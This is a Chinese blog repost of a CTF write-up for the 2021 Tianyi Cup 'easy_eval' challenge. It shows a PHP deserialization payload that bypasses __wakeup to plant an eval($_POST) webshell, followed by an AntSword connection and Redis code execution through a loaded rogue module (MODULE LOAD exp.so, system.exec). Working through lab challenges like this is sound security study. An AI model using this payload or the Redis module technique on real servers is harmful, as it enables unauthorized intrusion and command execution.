Redis教程
[天翼杯 2021]esay_eval--REDIS
本文主要是介绍[天翼杯 2021]esay_eval--REDIS,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
代码pop链子构造不难,问题是反序列化要绕过wakeup,正常就是改数字,但是这里有个正则过滤
注意匹配的是大写字母,而类的名称大小写即可,于是可以绕过
反序列化传入一个一句话代码,蚁剑连接
?poc=O:1:%22b%22:2:{s:1:%22a%22;O:1:%22a%22:1:{s:4:%22code%22;s:16:%22eval($_POST[1]);%22;}}
发现有文件
下载打开
发现Redis密码,猜测是Redis提权
用蚁剑连接Redis
蚁剑Redis插件地址: https://github.com/Medicean/AS_Redis
先在有权限的目录上传一个exp.so文件
文件地址:https://github.com/Dliv3/redis-rogue-server
在Redis命令行执行
MODULE LOAD /var/www/html/exp.so
system.exec "命令"
提权成功
这篇关于[天翼杯 2021]esay_eval--REDIS的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
您可能喜欢
-
阿里云Redis项目实战入门教程11-08
-
阿里云Redis资料:新手入门与初级使用指南11-08
-
阿里云Redis教程:新手入门及实用指南11-08
-
阿里云Redis学习入门:新手必读指南11-07
-
阿里云Redis学习入门:从零开始的操作指南11-07
-
阿里云Redis学习:初学者指南11-07
-
阿里云Redis入门教程:轻松搭建与使用指南11-06
-
Redis项目实战:新手入门教程11-02
-
Redis入门教程:轻松掌握数据存储与操作10-22
-
Redis缓存入门教程:快速掌握Redis缓存基础知识10-22
-
Redis入门指南:轻松掌握Redis基础操作10-22
-
Redis Quicklist 竟让内存占用狂降50%?10-22
-
Redis学习:从入门到初级应用教程10-17
-
Redis入门:新手必读教程10-12
-
阿里云Redis项目实战:新手入门教程09-26
栏目导航
